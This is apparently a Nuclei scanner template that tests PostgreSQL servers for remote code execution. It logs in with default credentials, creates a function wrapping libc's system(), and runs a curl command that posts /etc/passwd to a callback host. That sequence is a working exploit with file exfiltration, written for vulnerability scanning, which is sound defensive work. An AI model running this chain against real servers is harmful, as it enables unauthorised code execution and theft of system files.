nuclei-templates/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml

52 lines
1.9 KiB
YAML

id: pgsql-extensions-rce
info:
name: PostgreSQL 8.1 Extensions - Remote Code Execution
author: pussycat0x
severity: high
description: |
PostgreSQL allows for extensions, which are modules providing extra functionality like functions, operators, or types. Starting from version 8.1, these extensions must be compiled with a special header for compatibility with PostgreSQL's extension mechanism.
reference:
- https://www.dionach.com/postgresql-9-x-remote-command-execution/
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#using-libcso6
- https://hacktricks.boitatech.com.br/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions
metadata:
verified: true
max-request: 1
shodan-query: "product:\"PostgreSQL\""
tags: postgresql,js,network,rce
javascript:
- code: |
const postgres = require('nuclei/postgres');
const client = new postgres.PGClient;
const collab = shurl
const qry = ["CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;", "SELECT system('curl -X POST -d @/etc/passwd "+ collab +"');"];
for (const x of qry){
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, x);
Export(connected);
}
args:
Host: "{{Host}}"
Port: 5432
User: "{{usernames}}"
Pass: "{{password}}"
Db: "{{database}}"
shurl: http://{{interactsh-url}}
payloads:
usernames:
- postgres
database:
- postgres
password:
- postgres
attack: clusterbomb
matchers:
- type: regex
part: interactsh_request
regex:
- "root:[x*]:0:0:"
# digest: 490a0046304402204a7b50e1186d11ccd0034676de87f92710cedbc8085ffd69428d81b0410caf0d02201d1ad1956fe3f2753b210299a22f45f16b5fc9ddbc6c64958c21367ef95af431:922c64590222798bb761d5b6d8e72950